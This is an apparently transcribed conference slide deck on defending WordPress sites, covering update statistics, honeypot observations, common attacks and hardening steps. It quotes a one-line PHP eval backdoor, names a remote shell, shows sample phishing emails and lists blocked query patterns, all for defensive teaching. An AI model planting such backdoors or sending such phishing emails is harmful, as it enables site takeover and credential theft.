ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdfIntroduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
Introduction to FDO and How It works Applications _ Richard at FIDO Alliance.pdf
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Optimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through ObservabilityOptimizing NoSQL Performance Through Observability
Optimizing NoSQL Performance Through Observability
 
Buy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptxBuy Epson EcoTank L3210 Colour Printer Online.pptx
Buy Epson EcoTank L3210 Colour Printer Online.pptx
 
The Metaverse: Are We There Yet?
The  Metaverse:    Are   We  There  Yet?The  Metaverse:    Are   We  There  Yet?
The Metaverse: Are We There Yet?
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1UiPath Test Automation using UiPath Test Suite series, part 1
UiPath Test Automation using UiPath Test Suite series, part 1
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreel
 

WordPress Security: Defend yourself against digital invaders

  • 1. http://lynt.cz WordPress Security: Defend yourself against digital invaders Vláďa Smitka vladimir.smitka@lynt.cz @smitka Lynt services s.r.o. Update! Backup! Be careful!
  • 2. http://lynt.cz WP leaks like a sieve 10. 7. 2016 2 Have you ever heard that? Let's tell the truth.
  • 3. http://lynt.cz10. 7. 2016 3 Updated / Obsolete Web developers should push their customers to pay for support and provide responsibly. Customers should be willing to accept it – the website is one of their empoyee in fact.
  • 4. http://lynt.cz What is the current status? • Complex research of 65 000 czech sites 04/2015 10. 7. 2016 4 http://lynt.cz/blog/wordpress-in-the-czech-complex-research WP versions
  • 5. http://lynt.cz Status 2 days ago (02/2016) 10. 7. 2016 5 16 639 WP versions – 02/2016 unknown
  • 6. http://lynt.cz Status 2 days ago 10. 7. 2016 6 3.7.13 247 3.8.13 1779 3.9.10 2229 4.0.10 2570 4.1.10 2946 4.2.7 4305 4.3.3 4695 4.4.2 15225 Still updated versions
  • 7. http://lynt.cz Status 2 days ago (02/2016) 10. 7. 2016 7 25 % WP sites run on 3.6 or lower – security updates are no longer provided 18 % WP sites on 3.7 or higher haven‘t installed the latest security updates yet =At least 40 % of Czech WP sites contains security issues Current version 27 % Supported versions with updates 30 % Suported versions, without updates 18% Unsupported versions 28% WP versions recency
  • 8. http://lynt.cz What does it mean? • I ran the annual WordCamp HACK campaign! • Almost 1000 reports about critical vulnerabilities or hacked sites were sent • More than 300 vulnerable Slider Revolution plugins discovered! • A WordCamp invitation was included • Responses from owners and developers of the affected sites were less than warm… 10. 7. 2016 8
  • 9. http://lynt.cz How to manage updates? • WP Updates Notifier plugin sends an e-mail when an update is available • Tools allowing bulk management: – InfiniteWP – ManageWP – WP Remote • How to turn on the auto-update feature (mu- plugins): add_filter( 'auto_update_plugin', '__return_true' ); add_filter( 'auto_update_theme', '__return_true' ); 10. 7. 2016 9
  • 10. http://lynt.cz Infinite WP • Self-hosted • Base version for free (fully funcional, no limits) • Just install InfiniteWP Client plugin + copy&paste credentials 10. 7. 2016 10
  • 11. http://lynt.cz UPDATE 05/2016 • MainWP – new self-hosted bulk management system – looks very promising 10. 7. 2016 11
  • 12. http://lynt.cz Automated testing • If you are afraid that something important breaks after an update, it is possible to write automated tests • Casper.js • Selenuium • GhostPy • Online services: http://www.testomato.com/,... 10. 7. 2016 12
  • 14. http://lynt.cz What the hell do they want? • How do I know? => I analyzed many compromised systems + I run Honey Pots • http://pot.lynt.cz – it emulates an older WP with some vulnerabilites and there is also a fake SSH access 10. 7. 2016 14
  • 15. http://lynt.cz Honey Pot • How long did it take from the launch of a new machine to the first attacks? 10. 7. 2016 15 12 minutes • The Internet is dangerous – accept this fact and be prepared
  • 16. http://lynt.cz Ok, what do they want? • Inject malicious code to infect visitors and to show their ads • Send a SPAM • Attack other servers • Gain sensitive data • Shut down your site/the whole server 10. 7. 2016 16
  • 17. http://lynt.cz What does the uploaded evil code do? 10. 7. 2016 17 The first mention about Simple UDP flood is from 2004: https://forums.cpanel.net/threads/scr ipt-in-tmp-made-by-hacker.33184/ The most simple backdoor: eval($_POST[sam]); Remote shell – e.g. b374k Scripts to enable more attacks: • Password cracking • SPAM sending • Script Simple UDP flood
  • 18. http://lynt.cz What methods do they use? • Login • Comments • Particular bugs in plugins, themes or WP core • Tapping • Phishing • Cross site infection through other sites on a shared hosting 10. 7. 2016 18 Prepared backdoors: Hi, does anyone have an experience with ### site? They offer plugins just for few bucks They sell stolen plugins without the license, you can download them for free somewhere on the Internet
  • 19. http://lynt.cz Cross infection • Common problem on multihosting 10. 7. 2016 19 Folderwithallsites Web1 Web2 Web3
  • 20. http://lynt.cz How to login into WP? • /wp-admin + user name & password • XML-RPC (/xmlrpc.php) • Cookie • REST-API (/wp-json) – coming soon 10. 7. 2016 20
  • 21. http://lynt.cz Harvesting user logins • /?author=1 => /author/admin/ • Password admin, admin0, admin1,… Brute force Rules into .htaccess: RewriteCond %{QUERY_STRING} author= RewriteRule ^(.*)$ http://uckf.you? [L,R=301] 10. 7. 2016 21
  • 22. http://lynt.cz A hacker can tap your credentials 10. 7. 2016 22
  • 23. http://lynt.cz …or ask you directly Subject: A security problem on wordcamp.cz Date: Sat, 20 FEB 2016 09:51:48 +0200 From: HOSTING <your@amazing.hosting> To: <you> Dear customer, Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some Amazing Plugin“ which enables to gain full control over your website and attack other sites consequently. There is no official patch available yet but our team can fix the issue manually. For this purpose we need your credentials to your WP administration. Send them ASAP to stop the attacks. Otherwise we will be forced to turn off your site. Regards, Your Amazing Hosting, Inc. 10. 7. 2016 23
  • 24. http://lynt.cz XML RPC • /xmlrpc.php • This protocol allows remote control of your site from various applications – e.g. post publishing • The protocol is used rarely • But some plugins use it – JetPack • system.multicall function which allowed an attacker to test hundreds of passwords with one call (disclosured and fixed in September 2015) • If you want to use XML RPC, allow it only form particular IP addresses 10. 7. 2016 24 Block via .htaccess <Files "xmlrpc.php"> Order Allow,Deny deny from all </Files>
  • 26. http://lynt.cz Cookie wordpress_9338f7bf999516f89fdc070299cf0b82=admin %7C1456673124%7COB8LpfMl7ZqlMm1zuN23LMBGOna 0IdLmz4g7JQBwtYn%7Cb73f661495e9323a6df2dffe8001 5360b41ed8970a5cf05dd4053aecc4109a40 10. 7. 2016 26 • md5(URL) = http://pot.lynt.cz • User name • Validity = 28.2.2016 15:25:24 (+14 days) • Hash – AUTH_KEY + AUTH_SALT + 4 chars from password‘s hash • Token (od 4.0) hash 43 random chars
  • 27. http://lynt.cz Crypto keys in wp-config.php define('AUTH_KEY', 'put your unique phrase here'); define('SECURE_AUTH_KEY', 'put your unique phrase here'); define('LOGGED_IN_KEY', 'put your unique phrase here'); define('NONCE_KEY', 'put your unique phrase here'); define('AUTH_SALT', 'put your unique phrase here'); define('SECURE_AUTH_SALT', 'put your unique phrase here'); define('LOGGED_IN_SALT', 'put your unique phrase here'); define('NONCE_SALT', 'put your unique phrase here'); You can obtain new ones from: https://api.wordpress.org/secret-key/1.1/salt/ The HACK campaing discovered that 16 % of sites with a vulnerability in Slider Revolution also used default crypt keys. If you install WP via wp-config-sample.php renaming, don‘t forget to change the crypto keys! 10. 7. 2016 27
  • 28. http://lynt.cz WordPress 4.0+ 10. 7. 2016 28 You can invalidate the „remember me“ token and log off all users 36 % WP websites uses older version User profile:
  • 29. http://lynt.cz Cookie tapping 10. 7. 2016 29 Na rozdíl od jména a hesla, se cookie posílají stále.
  • 30. http://lynt.cz Higher rights – higher risks 10. 7. 2016 30 • Subscriber – Can read posts, edit their profile. The main benefit is easier commenting. • Contributor – Can write new posts but can‘t publish them (Editor or Administrator have to publish them). Doesn‘t have access to the Media Gallery (can embed images form external sources) – useful for guest blogging. • Author – Can manage their posts, manage comments on these posts. Had access to the Media Gallery. Can‘t manage pages. • Editor – Can manage all content – posts, pages, comments, categories. Can use javascript in comments. • Administrator – All rights – content, plugins, themes, widgets, menus. A good practice is not to create content with the admin account. • SuperAdministrator (only in WP multisite) – manages the network
  • 31. http://lynt.cz Privileges customization • Rights are editable – e.g. If a person needs to change the menu, they don‘t need the admin rights: • Use plugin User Role Editor • Or use a similar code: 10. 7. 2016 31 https://codex.wordpress.org/Roles_and_Capabilities $role_object = get_role( 'editor' ); $role_object->add_cap( 'edit_theme_options' );
  • 32. http://lynt.cz HTTPS • SSL cerificates are cheap (finally): • < 8 $/year – e.g. ssls.cz • Free – Let‘s Encrypt (needs support on server) • 2 options – Whole web on HTTPS (better) – Only administration on HTTPS 10. 7. 2016 32 git clone https://github.com/letsencrypt/letsencrypt /opt/letsencrypt ./letsencrypt-auto --apache -d <my-web> -d www. <my-web> Obnovovací skript: http://do.co/le-renew (le-renew <my-web>)
  • 33. http://lynt.cz Deploy HTTPS – whole web • Ask your host/admin to set up the certificate • Try if it works • Settings - General 10. 7. 2016 33 You can set up it also in the wp-config.php, - it saves DB queries: define('WP_HOME', 'https://<my-web>'); define('WP_SITEURL', 'http://<my-web>'); • There is a problem with the mixed content – WP makes absolute links – you need to fix it • SSL Insecure Content Fixer • Fix in admin – one by one • Fix in DB: UPDATE wp_posts SET post_content = REPLACE(post_content, 'http://<my-web>', 'https://<my-web>')
  • 34. http://lynt.cz Deploy HTTPS – administration only Place this code into wp-config.php: define( 'FORCE_SSL_ADMIN', true ); There is a problem with the mixed content in the Media Gallery: SSL Insecure Content Fixer + the „Simple“ settings 10. 7. 2016 34
  • 35. http://lynt.cz10. 7. 2016 35 Fixes CSS, JS and Images in the Media Gallery Fixes incorrect URLs in the content SSL Insecure Content - settings
  • 36. http://lynt.cz Redirect from HTTP to HTTPS In .htaccess: <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{SERVER_PORT} !^443$ RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L] RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> 10. 7. 2016 36 * May differ on some hostings
  • 37. http://lynt.cz Other encrypted protocols • SFTP/SCP instead FTP • SSH instead Telnet • IMAPs (POP3s) instead IMAP (POP3) • SMTP TLS/SMTP STARTTLS instead SMTP • VPN 10. 7. 2016 37
  • 38. http://lynt.cz How does the attack proceed? • Check publicly known information (domain owners, e-mail addresses, IPs, employees‘ names… recon-ng) • Active scan, identification - WP-scan • Agressive scan – e.g. DirBuster (tries if particular folders exist - /phpmyadmin/,…) • Vulnerabilities tests – generate suspicious queries • Can be detected - causes many 404 10. 7. 2016 38
  • 41. http://lynt.cz XSS – really dangerous 10. 7. 2016 41 Overlay reacts on mouse movement: onMouseMove Edit Themes
  • 42. http://lynt.cz XSS – at its maximum 10. 7. 2016 42
  • 43. http://lynt.cz Ask admin for help Subject: A security problem on wordcamp.cz Date: Sat, 20 FEB 2016 09:59:02 +0200 From: HOSTING <your@amazing.hosting> To: <you> Dear customer, Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some Amazing Plugin“ which enables to gain full control over your website and attack other sites consequently. You need to disable the funcion „Uglyness “ until a patch is available – you can do so simply via following link: http://<your-web>/wp-content/plugins/amazing-plugin/abc.php?xy=dG9obGUgamUgemx5IGtvZCA6LSk Please disable the function or delete the plugin, otherwise we will be forced to turn off your site. Regards, Your Amazing Hosting, Inc. 10. 7. 2016 43
  • 44. http://lynt.cz Cross-site request forgery • When the system doesn‘t check the origin of the request 10. 7. 2016 44 Hi Admin, check this cool site! Cool site Lorem ipsum /create new user for the attacker • The prevention are the „signed“ forms (there is a unique token added by server and checked after the submision) • WP uses „nonces“ (no all plugins use them…) /wp-admin/post.php?post=1&action=trash&_wpnonce=b192fc4204
  • 45. http://lynt.cz SQL Injection • Unsanitized inputs (again) • It is possible to modify DB queries and consequently obtain the complete data from DB • Interesting stuff in the DB: – E-mails – User names, hashed passwords – Auth Token for autologin Cookie – Credentials to external services 10. 7. 2016 45
  • 46. http://lynt.cz Security plugins • My favourite combo: • WordFence + BBQ: Bad Block Queries • Blocks invalid login attempts • Limits scans • File changes detection • Denies user logins harvesting • Denies PHP execution in uploads • Limits SPAM • Accesses to the global attackers list • Filters out the suspicious queries 10. 7. 2016 46
  • 48. http://lynt.cz WordFence – after installation 10. 7. 2016 48 Level 2: more notifications, limiting invalid logins Level 3: starts with the traffic limiting Level 4: blocks invalid login names immediately
  • 49. http://lynt.cz WordFence – Live Traffic 10. 7. 2016 49
  • 50. http://lynt.cz WordFence – file changes detection 10. 7. 2016 50
  • 51. http://lynt.cz WordFence – traffic limiting 10. 7. 2016 51
  • 52. http://lynt.cz WordFence – login security 10. 7. 2016 52
  • 53. http://lynt.cz WordFence – other options 10. 7. 2016 53
  • 54. http://lynt.cz WordFence – other options 10. 7. 2016 54 Great plugin but unfortunatelly it lacks blocking of suspicious queries
  • 55. http://lynt.cz10. 7. 2016 55 Simple plugin, no configuration – blocks suspicious queries E.g.: eval(, base64_, UNION * SELECT, wp-config.php, < …
  • 56. http://lynt.cz UPDATE 05/2016 • There is a new „Firewall“ feature in WordFence since 6.1.1 • It blocks suspicious queries  10. 7. 2016 56
  • 57. http://lynt.cz Recovery after infection • Stop the web (e.g. deny all in .htaccess) • Remove everything, restore from clean backup/ manual disinfection if no clean backup available (FAR) • Imitate the cause (usually update) • Change FTP password • Change DB password • Change users‘ passwords, check unknown users • New crypto keys into wp-config.php: https://api.wordpress.org/secret-key/1.1/salt/ • Check files for changes and evil code (Wordfence, Sucuri Scanner) 10. 7. 2016 57
  • 58. http://lynt.cz Inspiration – how do we protect our sites? • wp-login.php only from the Czech Republic (GeoIP module) • Blocked xmlrpc.php and some other files + disabled PHP in uploads • Comments spam blocking (NoSpamNX) + Ping/Track Back filter (Topsy Blocker) • Bulk updates management • Sites isolation • HTTP headers: – X-Frame-Options SAMEORIGIN; – X-XSS-Protection "1; mode=block" – X-Content-Type-Options nosniff • Deletion unused themes and plugins 10. 7. 2016 58
  • 59. http://lynt.cz Inspiration – how do we protect our sites? • Fail2Ban (invalid login attempts, too many 404, https://wordpress.org/plugins/wp-fail2ban/ ) • Suspicious queries filtering (serverside) • Realtime log (Log Stash) and error (Sentry) analysis • Server monitoring (Zabbix) • File changes detection + malware analysis – Maldet + Yara • Daily serverside backups (plugins can be used as well: BackWPup, UpdraftPlus, BackupBuddy) • Watch current resources about new threats 10. 7. 2016 59
  • 60. http://lynt.cz Resources • Information about vulnerabilities • https://www.owasp.org/ • https://wpvulndb.com/ • https://blog.sucuri.net/ • https://www.wordfence.com/blog/ • https://packetstormsecurity.com/ • https://www.reddit.com/r/xss • My presentation from last year: • http://www.slideshare.net/vsmitka/wordpress-security-for- everone 10. 7. 2016 60
  • 61. http://lynt.cz Homework for tomorrow □ Check unique crypto keys in the wp-config.php □ Create backup □ Remove unused plugins □ Remove all unused themes (you can keep one of the default themes and the parent theme) □ Lower user rights □ Update everything 10. 7. 2016 61
  • 62. http://lynt.cz Thank you for your attention 10. 7. 2016 62 Update, backup, use a security plugin, be careful